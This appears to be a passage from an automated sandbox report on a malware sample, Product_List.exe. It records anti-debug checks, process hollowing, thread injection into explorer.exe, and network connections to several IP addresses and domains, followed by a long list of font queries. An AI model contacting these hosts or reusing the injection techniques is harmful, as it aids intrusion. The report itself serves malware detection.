          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01838CD6 mov eax, dword ptr fs:[00000030h]3_2_01838CD6
          Source: C:\Users\user\Desktop\Product_List.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0040CF03 LdrLoadDll,3_2_0040CF03
          Source: C:\Users\user\Desktop\Product_List.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeDomain query: www.antalyabfe.com
          Source: C:\Windows\explorer.exeDomain query: www.rt66omm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.125.172 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jhg61.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.228.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.129.40.9 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.haynicorpon.biz
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Product_List.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Product_List.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Product_List.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Product_List.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess created: C:\Users\user\Desktop\Product_List.exe C:\Users\user\Desktop\Product_List.exeJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess created: C:\Users\user\Desktop\Product_List.exe C:\Users\user\Desktop\Product_List.exeJump to behavior
          Source: explorer.exe, 00000004.00000000.587825760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.811793412.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000002.817213827.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.587825760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.811793412.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.587825760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.811793412.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.811202989.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.587252069.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.587825760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.811793412.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Users\user\Desktop\Product_List.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
